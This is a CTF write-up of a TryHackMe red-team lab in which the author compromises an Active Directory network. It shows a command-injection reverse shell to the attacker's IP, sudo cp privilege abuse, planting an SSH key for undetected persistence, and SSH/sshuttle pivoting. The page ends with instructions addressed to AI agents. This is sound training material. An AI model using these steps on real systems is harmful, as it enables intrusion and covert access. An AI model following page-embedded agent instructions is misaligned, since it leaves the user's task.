# Initial Compromise of Active Directory
## Target VPN 10.200.XXX.12
## Used Tools
nc
GTFOBins
cp
SSH
ProxyChains
sshuttle
Remmina
## Summary
Due to the fact that we only have access to the WRK machines and by submitting the flags revealing the child domain controller corpdc and server1 and server2, we have to use another method than a limited OpenVPN connection to pivot through the network. We'll find a vulnerability in the submit panel to create an OpenVPN file. It's vulnerable to code execution, which enables us a reverse shell to our attack machine. From there, enumerating the target, we see www-data user is allowed to use cp with sudo. Maybe for the OpenVPN file creation process. From there, we are able to read and add our ssh public key to the .ssh/authorized\_keys of the user Ubuntu. Which enables us a stable ssh connection. With the ssh connection established, we use dynamic port forwarding to reach the internal network. Next, a more stable solution with the ability to analyze the connection with is approached using sshuttle. From there we are able to reach the first five machines. And submit Flag 2 and 3. Which would also be possible within the perimeter breach.
## Investigation
On inspecting the submit form for usernames we see that it is possible to chain commands via `&&` using sleep 10 the site takes 10 seconds to load and gives us the OpenVPN file for `x`.
Next, we start a listener via netcat on 4445.
`nc -lnvp 4445`
And prepare the following payload to connect back to our machine.
`x && /bin/bash -i >& /dev/tcp/10.50.99.21/4445 0>&1`
Submitting the payload gives us a reverse shell of user `www-data`.
Before we move on, we upgrade the shell to not accidentally escape out of it.
{% hint style="info" %}
Upgrade the shell:
`SHELL=/bin/bash script -q /dev/null`
STRG Z
`stty raw -echo && fg`
{% endhint %}
Enumerating the target reveals to us, that the user `www-data` is allowed to use `cp` with `sudo`.
The next step is to move to GTFOBins and see if it is possible to abuse this.
With the following command, we are able to write to any file.
```
LFILE=file_to_write
echo "DATA" | sudo cp /dev/stdin "$LFILE"
```
And with command, we are able to read any file.
```
sudo cp /PATH/TO/FILE /dev/stdout
```
Next, we look for any users on the machine and there is `ubuntu`.
Looking at the home directory of Ubuntu, we are able to read it and there is a `.ssh` folder.
The idea is to add our own public SSH key to `.ssh/authorized_keys` to SSH into Ubuntu.
This is our own key for this purpose.
Modify the following command to append your public key to the .`ssh/authorized_keys`
```
LFILE=file_to_write
echo "DATA" | sudo cp /dev/stdin "$LFILE"
```
Before we move on, we get the other keys of other participants and users from the `authorized_keys` to append our key to the `authorized_key` file to avoid breaking the persistence of other users of the network and remain undetected for the general user Ubuntu which might still want to SSH into his machine.
Before modifying check if the file exists and its current content
```bash
$ sudo cp /home/ubuntu/.ssh/authorized_keys /dev/stdout
```
Append the SSH public key to `.ssh/authorized_keys`
```
LFILE=/home/ubuntu/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCfF6dz1jBZ8ep/hscVkA/X1u/FjMG0iLU/myrPCj1b9S2OSYwiIwifrOTCkgx5dhMb/Mm6BhjEPv+9xmg1U/hoC01Sks2iOT0A5LR6mPDJ34wBJL1pqPFXETd7cC1bZF/UlNhETicpz6W2GGzr/pVRUdyXxBUEEWI+IO4ZA5NUv7wLXrdHEEPBlpEymeAtxKbawXB+vT3sAS5324XiYveGrYtHSinaHw4CXQN/iSgc0oLHkdwNzX7unsiUJOIpf5lIwp3ue+kQQNLl+QXlCWVK6UCEZX/6paeYPAv76qouT9A7jTzctSNJw2O1O+AknHlUq7TkrxURV5SwMHui6mKuMlPUzQ2Zh7ww2h4rARY0WJThhl33ex3uesWLGogpw5n3x+s/mcMukIdBHwA90/uYdASNGvi/1Stm/p3tloDw9dSR6yF6dvHHtJhrAUAP3yd+2HwZptmJTx04CYJvl5YB2BbICf3otAk6T8W5k04/2Ish4e84zSbYiE6YjFFPl40= 0xb0b@kali" | sudo cp /dev/stdin "$LFILE"
```
Just add the key with the following command, it is the same but does not contain the existing keys.
```
LFILE=/home/ubuntu/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCfF6dz1jBZ8ep/hscVkA/X1u/FjMG0iLU/myrPCj1b9S2OSYwiIwifrOTCkgx5dhMb/Mm6BhjEPv+9xmg1U/hoC01Sks2iOT0A5LR6mPDJ34wBJL1pqPFXETd7cC1bZF/UlNhETicpz6W2GGzr/pVRUdyXxBUEEWI+IO4ZA5NUv7wLXrdHEEPBlpEymeAtxKbawXB+vT3sAS5324XiYveGrYtHSinaHw4CXQN/iSgc0oLHkdwNzX7unsiUJOIpf5lIwp3ue+kQQNLl+QXlCWVK6UCEZX/6paeYPAv76qouT9A7jTzctSNJw2O1O+AknHlUq7TkrxURV5SwMHui6mKuMlPUzQ2Zh7ww2h4rARY0WJThhl33ex3uesWLGogpw5n3x+s/mcMukIdBHwA90/uYdASNGvi/1Stm/p3tloDw9dSR6yF6dvHHtJhrAUAP3yd+2HwZptmJTx04CYJvl5YB2BbICf3otAk6T8W5k04/2Ish4e84zSbYiE6YjFFPl40= 0xb0b@kali" | sudo cp /dev/stdin "$LFILE"
```
After adding our key to the `authorized_keys` file, we can SSH into the machine as user `ubuntu`.
Enumerating the target reveals to us that this user is allowed to run anything without providing a password with `sudo`.
Next, we check from the VPN machine every other reachable target from there excluding `10.200.103.250`. This time Host `.22` is missing but there is `.31`
With the ability to connect via SSH, we want to pivot through the network using SSH dynamic port forwarding. For this, we use
`ssh -D ` to redirect everything to port `9050`
`ssh -D 9050 -i capstone-vpn-id ubuntu@10.200.103.12`
From there, we enumerate the network excluding the e-citizen machine using ProxyChains to reach our connection established via `ssh-D`. Now we just look for machines that have the RDP port open, in the hope to find anything. Simply scanning for available targets - using ProxyChains - results in 255 reachable machines, which is not correct to the network diagram provided by the challenge.
`proxychains -q nmap -sT -Pn -p 3389 10.200.103.0/24 --exclude 10.200.103.250 --open`
For further investigations, especially for the next part of fully compromising the corp domain we use sshuttle to pivot through the network to not have to use ProxyChains.
`sshuttle --dns -vr [ubuntu@10.200.103.12](mailto:ubuntu@10.200.119.12) 10.200.103.0/24 -x 10.200.103.12 --ssh-cmd 'ssh -i /home/0xb0b/Documents/tryhackme/capstone/capstone-vpn-id'`
To test the ability to pivot through the network with sshuttle Nmap was used to scan a known port of a known machine.
`nmap -p 3389 10.200.103.31 -Pn -v`
Now reusing the credentials of laura.wood to conncect on machine WRK1.
Again we are able to connect to the machine via RDP and retrieve the next two flags.
## Flag-2: Breaching Active Directory
`echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > C:\Windows\Temp\0xb0b.txt`
## Flag-3: Foothold on Corporate Division Tier 2 Infrastructure
`echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > C:\Windows\Temp\0xb0b.txt`
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://0xb0b.gitbook.io/writeups/tryhackme/red-team-capstone-challenge/initial-compromise-of-active-directory.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.